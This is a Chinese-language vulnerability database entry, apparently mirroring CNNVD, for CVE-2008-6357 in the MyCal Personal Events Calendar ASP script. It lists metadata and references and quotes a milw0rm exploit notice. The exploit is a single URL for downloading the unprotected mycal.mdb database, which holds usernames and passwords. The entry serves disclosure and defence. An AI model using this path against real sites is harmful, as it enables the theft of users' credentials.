Donnafontenot MyCal Personal Events Calendar 'mycal.mdb'权限许可和访问控制漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117008 漏洞类型 权限许可和访问控制
发布时间 2008-12-11 更新时间 2009-03-02
CVE编号 CVE-2008-6357 CNNVD-ID CNNVD-200903-011
漏洞平台 ASP CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/7420
https://www.securityfocus.com/bid/84541
https://cxsecurity.com/issue/WLB-2009030122
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200903-011
|漏洞详情
MyCalPersonalEventsCalendar是一个基于WEB的个人的活动日程表程序,可以设置周期性活动,并查看每月,每周,每日日历。用户登录到创建自己的个人日历,并接收个人的事件提醒邮件。MyCalPersonalEventsCalendar在网站根目录下储存敏感信息,但没有赋予足够的访问限制,这会允许远程攻击者可以借助对mycal.mdb提交一个直接的请求,下载包含用户名和密码的数据库。
|漏洞EXP
****************************************************************************************
MyCal Personal Events Calendar (mycal.mdb) Database Disclosure Vulnerability
****************************************************************************************
 
Script Name : MyCal Personal Events Calendar
 
Author : CoBRa_21
 
My Site : www.ipbul.org
 
Download : http://www.funscripts.net/old_coldfusion/download.php?fname=mycal
 
****************************************************************************************
 
Exploit:
 
http://localhost/[PATH]/database/mycal.mdb
 
****************************************************************************************
 
Thanks: Cyber-Warrior.Org
 
****************************************************************************************

# milw0rm.com [2008-12-11]
|受影响的产品
Donnafontenot Mycal Personal Events Calendar -
|参考资料

来源:XF
名称:mycal-mycal-information-disclosure(47266)
链接:http://xforce.iss.net/xforce/xfdb/47266
来源:MILW0RM
名称:7420
链接:http://www.milw0rm.com/exploits/7420
来源:SECUNIA
名称:34261
链接:http://secunia.com/advisories/34261